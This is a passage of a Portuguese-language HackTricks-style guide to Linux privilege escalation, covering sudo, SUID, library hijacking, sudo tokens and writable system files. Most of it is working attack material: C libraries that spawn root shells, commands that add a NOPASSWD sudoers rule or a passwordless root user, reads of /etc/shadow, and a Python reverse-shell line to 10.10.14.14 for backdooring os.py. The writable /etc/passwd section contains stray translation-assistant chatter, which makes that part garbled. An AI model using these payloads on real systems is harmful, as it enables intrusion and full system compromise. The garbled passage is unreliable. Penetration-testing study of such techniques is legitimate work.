Se o sudoers preserva BASH_ENV (por exemplo, Defaults env_keep+="ENV BASH_ENV"), você pode aproveitar o comportamento de inicialização não interativa do Bash para executar código arbitrário como root ao invocar um comando permitido.

  • Why it works: Para shells não interativos, Bash avalia $BASH_ENV e carrega (sourced) esse arquivo antes de executar o script alvo. Muitas regras do sudo permitem executar um script ou um wrapper de shell. Se BASH_ENV for preservado pelo sudo, seu arquivo é carregado com privilégios de root.

  • Requisitos:

  • Uma regra do sudo que você possa executar (qualquer alvo que invoque /bin/bash de forma não interativa, ou qualquer script bash).

  • BASH_ENV presente em env_keep (verifique com sudo -l).

  • PoC:

bash
cat > /dev/shm/shell.sh <<'EOF'
#!/bin/bash
/bin/bash
EOF
chmod +x /dev/shm/shell.sh
BASH_ENV=/dev/shm/shell.sh sudo /usr/bin/systeminfo   # or any permitted script/binary that triggers bash
# You should now have a root shell
  • Hardening:
  • Remova BASH_ENV (e ENV) de env_keep, prefira env_reset.
  • Evite wrappers de shell para comandos permitidos pelo sudo; utilize binários mínimos.
  • Considere registro de I/O do sudo e alertas quando variáveis de ambiente preservadas forem usadas.

Sudo execution bypassing paths

Jump para ler outros arquivos ou use symlinks. Por exemplo no arquivo sudoers: hacker10 ALL= (root) /bin/less /var/log/*

bash
sudo less /var/logs/anything
less>:e /etc/shadow #Jump to read other files using privileged less
bash
ln /etc/shadow /var/log/new
sudo less /var/log/new #Use symlinks to read any file

Se um wildcard for usado (*), é ainda mais fácil:

bash
sudo less /var/log/../../etc/shadow #Read shadow
sudo less /var/log/something /etc/shadow #Red 2 files

Contramedidas: https://blog.compass-security.com/2012/10/dangerous-sudoers-entries-part-5-recapitulation/

Sudo command/SUID binary sem especificar o caminho do comando

Se a permissão sudo for dada a um único comando sem especificar o caminho: hacker10 ALL= (root) less. Você pode explorá-la alterando a variável PATH

bash
export PATH=/tmp:$PATH
#Put your backdoor in /tmp and name it "less"
sudo less

Esta técnica também pode ser usada se um suid binary executa outro comando sem especificar o caminho para ele (sempre verifique com strings o conteúdo de um binário SUID estranho)).

Payload examples to execute.

Binário SUID com caminho do comando

Se o suid binary executa outro comando especificando o caminho, então, você pode tentar exportar uma função com o nome do comando que o arquivo suid está chamando.

Por exemplo, se um binário suid chama /usr/sbin/service apache2 start você deve tentar criar a função e exportá-la:

bash
function /usr/sbin/service() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }
export -f /usr/sbin/service

Então, quando você chamar o binário suid, esta função será executada

LD_PRELOAD & LD_LIBRARY_PATH

A variável de ambiente LD_PRELOAD é usada para especificar uma ou mais shared libraries (.so files) a serem carregadas pelo loader antes de todas as outras, incluindo a biblioteca C padrão (libc.so). Esse processo é conhecido como preloading de uma biblioteca.

No entanto, para manter a segurança do sistema e evitar que esse recurso seja explorado, particularmente com executáveis suid/sgid, o sistema impõe certas condições:

  • O loader ignora LD_PRELOAD para executáveis onde o real user ID (ruid) não corresponde ao effective user ID (euid).
  • Para executáveis com suid/sgid, apenas bibliotecas em caminhos padrão que também sejam suid/sgid são pré-carregadas.

A escalada de privilégios pode ocorrer se você tiver a capacidade de executar comandos com sudo e a saída de sudo -l incluir a instrução env_keep+=LD_PRELOAD. Essa configuração permite que a variável de ambiente LD_PRELOAD persista e seja reconhecida mesmo quando comandos são executados com sudo, potencialmente levando à execução de código arbitrário com privilégios elevados.

Defaults        env_keep += LD_PRELOAD

Salvar como /tmp/pe.c

c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/bash");
}

Então compile-o usando:

bash
cd /tmp
gcc -fPIC -shared -o pe.so pe.c -nostartfiles

Finalmente, escalate privileges executando

bash
sudo LD_PRELOAD=./pe.so <COMMAND> #Use any command you can run with sudo

caution

Um privesc similar pode ser explorado se o atacante controlar a variável de ambiente LD_LIBRARY_PATH, pois ele controla o caminho onde as bibliotecas serão procuradas.

c
#include <stdio.h>
#include <stdlib.h>

static void hijack() __attribute__((constructor));

void hijack() {
unsetenv("LD_LIBRARY_PATH");
setresuid(0,0,0);
system("/bin/bash -p");
}
bash
# Compile & execute
cd /tmp
gcc -o /tmp/libcrypt.so.1 -shared -fPIC /home/user/tools/sudo/library_path.c
sudo LD_LIBRARY_PATH=/tmp <COMMAND>

SUID Binary – .so injection

Ao encontrar um binary com permissões SUID que parece incomum, é boa prática verificar se ele está carregando arquivos .so corretamente. Isso pode ser verificado executando o seguinte comando:

bash
strace <SUID-BINARY> 2>&1 | grep -i -E "open|access|no such file"

Por exemplo, ao encontrar um erro como "open(“/path/to/.config/libcalc.so”, O_RDONLY) = -1 ENOENT (No such file or directory)" sugere um potencial para exploração.

Para explorar isso, procede-se criando um arquivo C, por exemplo "/path/to/.config/libcalc.c", contendo o seguinte código:

c
#include <stdio.h>
#include <stdlib.h>

static void inject() __attribute__((constructor));

void inject(){
system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");
}

Este código, uma vez compilado e executado, visa elevate privileges manipulando file permissions e executando um shell com elevated privileges.

Compile o arquivo C acima em um shared object (.so) com:

bash
gcc -shared -o /path/to/.config/libcalc.so -fPIC /path/to/.config/libcalc.c

Finalmente, executar o binário SUID afetado deve acionar o exploit, permitindo um possível comprometimento do sistema.

Shared Object Hijacking

bash
# Lets find a SUID using a non-standard library
ldd some_suid
something.so => /lib/x86_64-linux-gnu/something.so

# The SUID also loads libraries from a custom location where we can write
readelf -d payroll  | grep PATH
0x000000000000001d (RUNPATH)            Library runpath: [/development]

Agora que encontramos um binário SUID que carrega uma biblioteca de uma pasta onde podemos escrever, vamos criar a biblioteca nessa pasta com o nome necessário:

c
//gcc src.c -fPIC -shared -o /development/libshared.so
#include <stdio.h>
#include <stdlib.h>

static void hijack() __attribute__((constructor));

void hijack() {
setresuid(0,0,0);
system("/bin/bash -p");
}

Se você receber um erro como

shell-session
./suid_bin: symbol lookup error: ./suid_bin: undefined symbol: a_function_name

isso significa que a biblioteca que você gerou precisa ter uma função chamada a_function_name.

GTFOBins

GTFOBins é uma lista curada de binários Unix que podem ser explorados por um atacante para contornar restrições de segurança locais. GTFOArgs é o mesmo, mas para casos em que você pode apenas injetar argumentos em um comando.

O projeto reúne funções legítimas de binários Unix que podem ser abusadas para escapar de shells restritos, escalar ou manter privilégios elevados, transferir arquivos, gerar bind e reverse shells, e facilitar outras tarefas de pós-exploração.

gdb -nx -ex '!sh' -ex quit
sudo mysql -e '! /bin/sh'
strace -o /dev/null /bin/sh
sudo awk 'BEGIN {system("/bin/sh")}'

\n \n GTFOBins\n

\n \n GTFOArgs\n

FallOfSudo

Se você pode acessar sudo -l você pode usar a ferramenta FallOfSudo para verificar se ela encontra alguma forma de explorar alguma regra do sudo.

Reutilizando tokens do sudo

Em casos em que você tem sudo access mas não a senha, você pode escalar privilégios esperando a execução de um comando sudo e então sequestrando o token de sessão.

Requisitos para escalar privilégios:

  • Você já tem um shell como o usuário "sampleuser"
  • "sampleuser" tenha utilizado sudo para executar algo nos últimos 15 minutos (por padrão essa é a duração do token do sudo que nos permite usar sudo sem inserir nenhuma senha)
  • cat /proc/sys/kernel/yama/ptrace_scope é 0
  • gdb está acessível (você pode fazer upload dele)

(Você pode habilitar temporariamente o ptrace_scope com echo 0 | sudo tee /proc/sys/kernel/yama/ptrace_scope ou modificando permanentemente /etc/sysctl.d/10-ptrace.conf e definindo kernel.yama.ptrace_scope = 0)

Se todos esses requisitos forem atendidos, você pode escalar privilégios usando: https://github.com/nongiach/sudo_inject

  • O primeiro exploit (exploit.sh) vai criar o binário activate_sudo_token em /tmp. Você pode usá-lo para ativar o token do sudo na sua sessão (você não obterá automaticamente um shell root, execute sudo su):
bash
bash exploit.sh
/tmp/activate_sudo_token
sudo su
  • O segundo exploit (exploit_v2.sh) criará um shell sh em /tmp de propriedade do root com setuid
bash
bash exploit_v2.sh
/tmp/sh -p
  • O terceiro exploit (exploit_v3.sh) vai criar um sudoers file que torna sudo tokens eternos e permite que todos os usuários usem sudo
bash
bash exploit_v3.sh
sudo su

/var/run/sudo/ts/<Username>

Se você tem permissões de escrita na pasta ou em qualquer um dos arquivos criados dentro dela, pode usar o binário write_sudo_token para criar um sudo token para um usuário e PID.
Por exemplo, se você puder sobrescrever o arquivo /var/run/sudo/ts/sampleuser e tiver um shell como esse usuário com PID 1234, você pode obter privilégios sudo sem precisar saber a senha, fazendo:

bash
./write_sudo_token 1234 > /var/run/sudo/ts/sampleuser

/etc/sudoers, /etc/sudoers.d

O arquivo /etc/sudoers e os arquivos dentro de /etc/sudoers.d configuram quem pode usar sudo e como. Esses arquivos por padrão só podem ser lidos pelo usuário root e pelo grupo root.
Se você conseguir ler esse arquivo, pode ser capaz de obter informações interessantes, e se conseguir escrever em qualquer arquivo, você será capaz de escalar privilégios.

bash
ls -l /etc/sudoers /etc/sudoers.d/
ls -ld /etc/sudoers.d/

Se você pode escrever, pode abusar desta permissão.

bash
echo "$(whoami) ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers
echo "$(whoami) ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers.d/README

Outra forma de abusar dessas permissões:

bash
# makes it so every terminal can sudo
echo "Defaults !tty_tickets" > /etc/sudoers.d/win
# makes it so sudo never times out
echo "Defaults timestamp_timeout=-1" >> /etc/sudoers.d/win

DOAS

Existem algumas alternativas ao binário sudo, como o doas do OpenBSD; lembre-se de verificar a sua configuração em /etc/doas.conf

permit nopass demo as root cmd vim

Sudo Hijacking

Se você sabe que um usuário normalmente se conecta a uma máquina e usa sudo para escalar privilégios e você obteve um shell nesse contexto de usuário, você pode criar um novo executável sudo que executará seu código como root e depois o comando do usuário. Em seguida, modificar o $PATH do contexto do usuário (por exemplo adicionando o novo caminho em .bash_profile) para que, quando o usuário executar sudo, seu executável sudo seja executado.

Observe que se o usuário usa um shell diferente (não bash) você precisará modificar outros arquivos para adicionar o novo caminho. Por exemplo sudo-piggyback modifica ~/.bashrc, ~/.zshrc, ~/.bash_profile. Você pode encontrar outro exemplo em bashdoor.py

Ou executando algo como:

bash
cat >/tmp/sudo <<EOF
#!/bin/bash
/usr/bin/sudo whoami > /tmp/privesc
/usr/bin/sudo "\$@"
EOF
chmod +x /tmp/sudo
echo ‘export PATH=/tmp:$PATH’ >> $HOME/.zshenv # or ".bashrc" or any other

# From the victim
zsh
echo $PATH
sudo ls

Biblioteca Compartilhada

ld.so

O arquivo /etc/ld.so.conf indica de onde vêm os arquivos de configuração carregados. Normalmente, este arquivo contém o seguinte caminho: include /etc/ld.so.conf.d/*.conf

Isso significa que os arquivos de configuração em /etc/ld.so.conf.d/*.conf serão lidos. Esses arquivos de configuração apontam para outras pastas onde bibliotecas serão procuradas. Por exemplo, o conteúdo de /etc/ld.so.conf.d/libc.conf é /usr/local/lib. Isso significa que o sistema irá procurar por bibliotecas dentro de /usr/local/lib.

Se por algum motivo um usuário tem permissões de escrita em qualquer um dos caminhos indicados: /etc/ld.so.conf, /etc/ld.so.conf.d/, qualquer arquivo dentro de /etc/ld.so.conf.d/ ou qualquer pasta referenciada pelos arquivos em /etc/ld.so.conf.d/*.conf ele pode ser capaz de escalar privilégios.
Veja como explorar essa má configuração na página a seguir:

ld.so privesc exploit example

RPATH

level15@nebula:/home/flag15$ readelf -d flag15 | egrep "NEEDED|RPATH"
0x00000001 (NEEDED)                     Shared library: [libc.so.6]
0x0000000f (RPATH)                      Library rpath: [/var/tmp/flag15]

level15@nebula:/home/flag15$ ldd ./flag15
linux-gate.so.1 =>  (0x0068c000)
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0x00110000)
/lib/ld-linux.so.2 (0x005bb000)

Ao copiar a lib para /var/tmp/flag15/, ela será usada pelo programa neste local conforme especificado na variável RPATH.

level15@nebula:/home/flag15$ cp /lib/i386-linux-gnu/libc.so.6 /var/tmp/flag15/

level15@nebula:/home/flag15$ ldd ./flag15
linux-gate.so.1 =>  (0x005b0000)
libc.so.6 => /var/tmp/flag15/libc.so.6 (0x00110000)
/lib/ld-linux.so.2 (0x00737000)

Em seguida, crie uma biblioteca maliciosa em /var/tmp com gcc -fPIC -shared -static-libgcc -Wl,--version-script=version,-Bstatic exploit.c -o libc.so.6

c
#include<stdlib.h>
#define SHELL "/bin/sh"

int __libc_start_main(int (*main) (int, char **, char **), int argc, char ** ubp_av, void (*init) (void), void (*fini) (void), void (*rtld_fini) (void), void (* stack_end))
{
char *file = SHELL;
char *argv[] = {SHELL,0};
setresuid(geteuid(),geteuid(), geteuid());
execve(file,argv,0);
}

Capacidades

Linux capabilities provide a subconjunto dos privilégios root disponíveis a um processo. Isto divide efetivamente os privilégios root em unidades menores e distintas. Cada uma dessas unidades pode então ser concedida de forma independente a processos. Dessa forma o conjunto completo de privilégios é reduzido, diminuindo os riscos de exploração.
Leia a página a seguir para aprender mais sobre capabilities e como abusar delas:

Linux Capabilities

Permissões de diretório

Em um diretório, o bit para "execute" implica que o usuário afetado pode "cd" para dentro da pasta.
O bit "read" implica que o usuário pode listar os arquivos, e o bit "write" implica que o usuário pode deletar e criar novos arquivos.

ACLs

Listas de Controle de Acesso (ACLs) representam a camada secundária de permissões discricionárias, capazes de sobrepor as tradicionais permissões ugo/rwx. Essas permissões aumentam o controle sobre o acesso a arquivos ou diretórios ao permitir ou negar direitos a usuários específicos que não são os proprietários nem fazem parte do grupo. Esse nível de granularidade garante um gerenciamento de acesso mais preciso. Mais detalhes podem ser encontrados aqui.

ao usuário "kali" permissões de leitura e escrita sobre um arquivo:

bash
setfacl -m u:kali:rw file.txt
#Set it in /etc/sudoers or /etc/sudoers.d/README (if the dir is included)

setfacl -b file.txt #Remove the ACL of the file

Obter arquivos com ACLs específicas do sistema:

bash
getfacl -t -s -R -p /bin /etc /home /opt /root /sbin /usr /tmp 2>/dev/null

Sessões de shell abertas

Em versões antigas você pode hijack alguma sessão de shell de um usuário diferente (root).
Em versões mais recentes você só poderá connect a screen sessions do seu próprio usuário. No entanto, você pode encontrar informações interessantes dentro da sessão.

screen sessions hijacking

Listar screen sessions

bash
screen -ls
screen -ls <username>/ # Show another user' screen sessions

Anexar a uma sessão

bash
screen -dr <session> #The -d is to detach whoever is attached to it
screen -dr 3350.foo #In the example of the image
screen -x [user]/[session id]

tmux sessions hijacking

Isto era um problema com versões antigas do tmux. Não consegui realizar o hijack de uma sessão tmux (v2.1) criada pelo root como usuário não privilegiado.

Listar sessões tmux

bash
tmux ls
ps aux | grep tmux #Search for tmux consoles not using default folder for sockets
tmux -S /tmp/dev_sess ls #List using that socket, you can start a tmux session in that socket with: tmux -S /tmp/dev_sess

Anexar a uma sessão

bash
tmux attach -t myname #If you write something in this session it will appears in the other opened one
tmux attach -d -t myname #First detach the session from the other console and then access it yourself

ls -la /tmp/dev_sess #Check who can access it
rw-rw---- 1 root devs 0 Sep  1 06:27 /tmp/dev_sess #In this case root and devs can
# If you are root or devs you can access it
tmux -S /tmp/dev_sess attach -t 0 #Attach using a non-default tmux socket

Veja Valentine box from HTB como exemplo.

SSH

Debian OpenSSL Predictable PRNG - CVE-2008-0166

Todas as chaves SSL e SSH geradas em sistemas baseados em Debian (Ubuntu, Kubuntu, etc) entre setembro de 2006 e 13 de maio de 2008 podem ser afetadas por este bug.
Este bug ocorre ao criar uma nova ssh key nesses sistemas, pois apenas 32,768 variações eram possíveis. Isto significa que todas as possibilidades podem ser calculadas e, com a ssh public key em mãos, você pode procurar a private key correspondente. Você pode encontrar as possibilidades calculadas aqui: https://github.com/g0tmi1k/debian-ssh

SSH Interesting configuration values

  • PasswordAuthentication: Especifica se a autenticação por senha é permitida. O padrão é no.
  • PubkeyAuthentication: Especifica se a autenticação por public key é permitida. O padrão é yes.
  • PermitEmptyPasswords: Quando a autenticação por senha está permitida, especifica se o servidor permite login em contas com senhas vazias. O padrão é no.

PermitRootLogin

Especifica se o root pode fazer login usando ssh, o padrão é no. Valores possíveis:

  • yes: root pode fazer login usando senha e private key
  • without-password or prohibit-password: root só pode fazer login com uma private key
  • forced-commands-only: root só pode fazer login usando private key e se as opções de comando estiverem especificadas
  • no : não

AuthorizedKeysFile

Especifica arquivos que contêm as public keys que podem ser usadas para autenticação de usuário. Pode conter tokens como %h, que serão substituídos pelo diretório home. Você pode indicar caminhos absolutos (iniciando em /) ou caminhos relativos a partir do home do usuário. Por exemplo:

bash
AuthorizedKeysFile    .ssh/authorized_keys access

Essa configuração indicará que, se você tentar fazer login com a private key do usuário "testusername", o ssh irá comparar a public key da sua key com as localizadas em /home/testusername/.ssh/authorized_keys e /home/testusername/access

ForwardAgent/AllowAgentForwarding

SSH agent forwarding permite que você use your local SSH keys instead of leaving keys (without passphrases!) no seu servidor. Assim, você poderá jump via ssh to a host e, a partir daí, jump to another host using the key localizada no seu initial host.

Você precisa definir essa opção em $HOME/.ssh.config assim:

Host example.com
ForwardAgent yes

Note que se Host for *, toda vez que o usuário se conecta a uma máquina diferente, esse host poderá acessar as chaves (o que é um problema de segurança).

O arquivo /etc/ssh_config pode sobrescrever essas opções e permitir ou negar essa configuração.
O arquivo /etc/sshd_config pode permitir ou negar o ssh-agent forwarding com a palavra-chave AllowAgentForwarding (o padrão é allow).

Se você encontrar que Forward Agent está configurado em um ambiente, leia a página a seguir, pois pode ser possível abusar disso para escalar privilégios:

SSH Forward Agent exploitation

Arquivos Interessantes

Arquivos de profile

O arquivo /etc/profile e os arquivos em /etc/profile.d/ são scripts que são executados quando um usuário inicia um novo shell. Portanto, se você puder escrever ou modificar qualquer um deles, poderá escalar privilégios.

bash
ls -l /etc/profile /etc/profile.d/

Se algum script de perfil estranho for encontrado, você deve verificá-lo em busca de detalhes sensíveis.

Arquivos Passwd/Shadow

Dependendo do sistema operacional, os arquivos /etc/passwd e /etc/shadow podem estar usando um nome diferente ou pode haver um backup. Portanto, é recomendado encontrar todos eles e verificar se você pode lê-los para ver se há hashes dentro dos arquivos:

bash
#Passwd equivalent files
cat /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null
#Shadow equivalent files
cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db /etc/security/opasswd 2>/dev/null

Em algumas ocasiões você pode encontrar password hashes dentro do arquivo /etc/passwd (ou equivalente)

bash
grep -v '^[^:]*:[x\*]' /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null

/etc/passwd gravável

Primeiro, gere uma senha com um dos seguintes comandos.

openssl passwd -1 -salt hacker hacker
mkpasswd -m SHA-512 hacker
python2 -c 'import crypt; print crypt.crypt("hacker", "$6$salt")'

Preciso do conteúdo do arquivo src/linux-hardening/privilege-escalation/README.md para poder traduzi-lo.

Quer que eu insira também no README instruções para criar o usuário hacker e adicionar a senha gerada? Se sim, informe a senha gerada ou diga se quer que eu gere uma senha e a inclua no texto traduzido.

hacker:GENERATED_PASSWORD_HERE:0:0:Hacker:/root:/bin/bash

Por exemplo: hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash

Agora você pode usar o comando su com hacker:hacker

Alternativamente, você pode usar as linhas a seguir para adicionar um dummy user sem senha.
AVISO: isso pode degradar a segurança atual da máquina.

echo 'dummy::0:0::/root:/bin/bash' >>/etc/passwd
su - dummy

NOTA: Em plataformas BSD /etc/passwd está localizado em /etc/pwd.db e /etc/master.passwd, além disso /etc/shadow é renomeado para /etc/spwd.db.

Você deve verificar se consegue escrever em alguns arquivos sensíveis. Por exemplo, você consegue escrever em algum arquivo de configuração de serviço?

bash
find / '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' 2>/dev/null | grep -v '/proc/' | grep -v $HOME | sort | uniq #Find files owned by the user or writable by anybody
for g in `groups`; do find \( -type f -or -type d \) -group $g -perm -g=w 2>/dev/null | grep -v '/proc/' | grep -v $HOME; done #Find files writable by any group of the user

Por exemplo, se a máquina estiver executando um servidor tomcat e você puder modificar o arquivo de configuração do serviço Tomcat dentro de /etc/systemd/, então você pode modificar as linhas:

ExecStart=/path/to/backdoor
User=root
Group=root

Sua backdoor será executada na próxima vez que o tomcat for iniciado.

Verificar Pastas

As seguintes pastas podem conter backups ou informações interessantes: /tmp, /var/tmp, /var/backups, /var/mail, /var/spool/mail, /etc/exports, /root (Provavelmente você não conseguirá ler o último, mas tente)

bash
ls -a /tmp /var/tmp /var/backups /var/mail/ /var/spool/mail/ /root

Localização Estranha/Owned files

bash
#root owned files in /home folders
find /home -user root 2>/dev/null
#Files owned by other users in folders owned by me
for d in `find /var /etc /home /root /tmp /usr /opt /boot /sys -type d -user $(whoami) 2>/dev/null`; do find $d ! -user `whoami` -exec ls -l {} \; 2>/dev/null; done
#Files owned by root, readable by me but not world readable
find / -type f -user root ! -perm -o=r 2>/dev/null
#Files owned by me or world writable
find / '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null
#Writable files by each group I belong to
for g in `groups`;
do printf "  Group $g:\n";
find / '(' -type f -or -type d ')' -group $g -perm -g=w ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null
done
done

Arquivos modificados nos últimos minutos

bash
find / -type f -mmin -5 ! -path "/proc/*" ! -path "/sys/*" ! -path "/run/*" ! -path "/dev/*" ! -path "/var/lib/*" 2>/dev/null

Arquivos Sqlite DB

bash
find / -name '*.db' -o -name '*.sqlite' -o -name '*.sqlite3' 2>/dev/null

*_history, .sudo_as_admin_successful, profile, bashrc, httpd.conf, .plan, .htpasswd, .git-credentials, .rhosts, hosts.equiv, Dockerfile, docker-compose.yml arquivos

bash
find / -type f \( -name "*_history" -o -name ".sudo_as_admin_successful" -o -name ".profile" -o -name "*bashrc" -o -name "httpd.conf" -o -name "*.plan" -o -name ".htpasswd" -o -name ".git-credentials" -o -name "*.rhosts" -o -name "hosts.equiv" -o -name "Dockerfile" -o -name "docker-compose.yml" \) 2>/dev/null

Arquivos ocultos

bash
find / -type f -iname ".*" -ls 2>/dev/null

Scripts/Binários no PATH

bash
for d in `echo $PATH | tr ":" "\n"`; do find $d -name "*.sh" 2>/dev/null; done
for d in `echo $PATH | tr ":" "\n"`; do find $d -type f -executable 2>/dev/null; done

Arquivos web

bash
ls -alhR /var/www/ 2>/dev/null
ls -alhR /srv/www/htdocs/ 2>/dev/null
ls -alhR /usr/local/www/apache22/data/
ls -alhR /opt/lampp/htdocs/ 2>/dev/null

Cópias de segurança

bash
find /var /etc /bin /sbin /home /usr/local/bin /usr/local/sbin /usr/bin /usr/games /usr/sbin /root /tmp -type f \( -name "*backup*" -o -name "*\.bak" -o -name "*\.bck" -o -name "*\.bk" \) 2>/dev/null

Arquivos conhecidos que contêm senhas

Leia o código de linPEAS, ele procura por vários arquivos que podem conter senhas.
Outra ferramenta interessante que você pode usar para isso é: LaZagne que é uma aplicação de código aberto usada para recuperar muitas senhas armazenadas em um computador local para Windows, Linux & Mac.

Logs

Se você consegue ler logs, pode ser capaz de encontrar informações interessantes/confidenciais neles. Quanto mais estranho o log for, mais interessante ele provavelmente será.
Além disso, alguns mal configurados (backdoored?) audit logs podem permitir que você registre senhas dentro dos audit logs como explicado neste post: https://www.redsiege.com/blog/2019/05/logging-passwords-on-linux/.

bash
aureport --tty | grep -E "su |sudo " | sed -E "s,su|sudo,${C}[1;31m&${C}[0m,g"
grep -RE 'comm="su"|comm="sudo"' /var/log* 2>/dev/null

Para ler logs, o grupo adm será muito útil.

Shell files

bash
~/.bash_profile # if it exists, read it once when you log in to the shell
~/.bash_login # if it exists, read it once if .bash_profile doesn't exist
~/.profile # if it exists, read once if the two above don't exist
/etc/profile # only read if none of the above exists
~/.bashrc # if it exists, read it every time you start a new shell
~/.bash_logout # if it exists, read when the login shell exits
~/.zlogin #zsh shell
~/.zshrc #zsh shell

Generic Creds Search/Regex

Você também deve verificar arquivos que contenham a palavra "password" no nome ou dentro do conteúdo, e também verificar por IPs e emails dentro de logs, ou regexps de hashes.\
Não vou listar aqui como fazer tudo isso, mas se tiver interesse pode conferir as últimas verificações que linpeas realiza.

Arquivos graváveis

Python library hijacking

If you know from where a python script is going to be executed and you can write inside that folder or you can modify python libraries, you can modify the OS library and backdoor it (if you can write where python script is going to be executed, copy and paste the os.py library).

Para backdoor the library basta adicionar ao final da biblioteca os.py a seguinte linha (mude IP e PORT):

python
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.14",5678));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

Exploração do logrotate

Uma vulnerabilidade no logrotate permite que usuários com permissão de escrita em um arquivo de log ou em seus diretórios pai potencialmente obtenham privilégios elevados. Isso ocorre porque o logrotate, frequentemente executado como root, pode ser manipulado para executar arquivos arbitrários, especialmente em diretórios como /etc/bash_completion.d/. É importante verificar permissões não apenas em /var/log mas também em qualquer diretório onde a rotação de logs seja aplicada.

tip

Essa vulnerabilidade afeta o logrotate versão 3.18.0 e anteriores

Informações mais detalhadas sobre a vulnerabilidade podem ser encontradas nesta página: https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition.

Você pode explorar essa vulnerabilidade com logrotten.

Essa vulnerabilidade é muito similar a CVE-2016-1247 (nginx logs), então sempre que você encontrar que pode alterar logs, verifique quem está gerenciando esses logs e veja se é possível escalar privilégios substituindo os logs por symlinks.

/etc/sysconfig/network-scripts/ (Centos/Redhat)

Referência da vulnerabilidade: https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f

Se, por qualquer motivo, um usuário for capaz de escrever um script ifcf-<whatever> em /etc/sysconfig/network-scripts ou conseguir ajustar um existente, então seu system is pwned.

Network scripts, ifcg-eth0, por exemplo, são usados para conexões de rede. Eles se parecem exatamente com arquivos .INI. Porém, eles são ~sourced~ no Linux pelo Network Manager (dispatcher.d).

No meu caso, o NAME= atribuído nesses network scripts não é tratado corretamente. Se você tiver espaço em branco no nome, o sistema tenta executar a parte após o espaço em branco. Isso significa que tudo após o primeiro espaço em branco é executado como root.

For example: /etc/sysconfig/network-scripts/ifcfg-1337

bash
NAME=Network /bin/id
ONBOOT=yes
DEVICE=eth0

(Observe o espaço em branco entre Network e /bin/id)

init, init.d, systemd, and rc.d

O diretório /etc/init.d abriga scripts para System V init (SysVinit), o sistema clássico de gerenciamento de serviços do Linux. Inclui scripts para start, stop, restart e, às vezes, reload de serviços. Estes podem ser executados diretamente ou através de links simbólicos encontrados em /etc/rc?.d/. Um caminho alternativo em sistemas Redhat é /etc/rc.d/init.d.

Por outro lado, /etc/init está associado ao Upstart, um gerenciador de serviços mais recente introduzido pelo Ubuntu, que usa arquivos de configuração para tarefas de gerenciamento de serviços. Apesar da transição para o Upstart, os scripts SysVinit ainda são utilizados juntamente às configurações do Upstart devido a uma camada de compatibilidade no Upstart.

systemd surge como um gerenciador moderno de inicialização e serviços, oferecendo recursos avançados como inicialização on-demand de daemons, gerenciamento de automount e snapshots do estado do sistema. Ele organiza arquivos em /usr/lib/systemd/ para pacotes de distribuição e /etc/systemd/system/ para modificações do administrador, simplificando o processo de administração do sistema.

Other Tricks

NFS Privilege escalation

NFS no_root_squash/no_all_squash misconfiguration PE

Escaping from restricted Shells

Escaping from Jails

Cisco - vmanage

Cisco - vmanage

Android rooting frameworks: manager-channel abuse

Android rooting frameworks comumente hookam uma syscall para expor funcionalidades privilegiadas do kernel a um manager em userspace. Autenticação fraca do manager (por exemplo, checagens de assinatura baseadas em FD-order ou esquemas de senha fracos) pode permitir que um app local se faça passar pelo manager e escale para root em dispositivos já-rooted. Saiba mais e detalhes de exploração aqui:

Android Rooting Frameworks Manager Auth Bypass Syscall Hook

VMware Tools service discovery LPE (CWE-426) via regex-based exec (CVE-2025-41244)

Descoberta de serviços orientada por regex em VMware Tools/Aria Operations pode extrair um caminho de binário das linhas de comando de processos e executá-lo com -v em um contexto privilegiado. Padrões permissivos (por exemplo, usando \S) podem corresponder a listeners staged pelo atacante em locais graváveis (por exemplo, /tmp/httpd), levando à execução como root (CWE-426 Untrusted Search Path).

Saiba mais e veja um padrão generalizado aplicável a outras stacks de discovery/monitoring aqui:

Vmware Tools Service Discovery Untrusted Search Path Cve 2025 41244

Kernel Security Protections

More help

Static impacket binaries

Linux/Unix Privesc Tools

Best tool to look for Linux local privilege escalation vectors: LinPEAS

LinEnum: https://github.com/rebootuser/LinEnum(-t option)
Enumy: https://github.com/luke-goddard/enumy
Unix Privesc Check: http://pentestmonkey.net/tools/audit/unix-privesc-check
Linux Priv Checker: www.securitysift.com/download/linuxprivchecker.py
BeeRoot: https://github.com/AlessandroZ/BeRoot/tree/master/Linux
Kernelpop: Enumerate kernel vulns ins linux and MAC https://github.com/spencerdodd/kernelpop
Mestaploit: multi/recon/local_exploit_suggester
Linux Exploit Suggester: https://github.com/mzet-/linux-exploit-suggester
EvilAbigail (physical access): https://github.com/GDSSecurity/EvilAbigail
Recopilation of more scripts: https://github.com/1N3/PrivEsc

References

tip

Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Aprenda e pratique Hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Supporte o HackTricks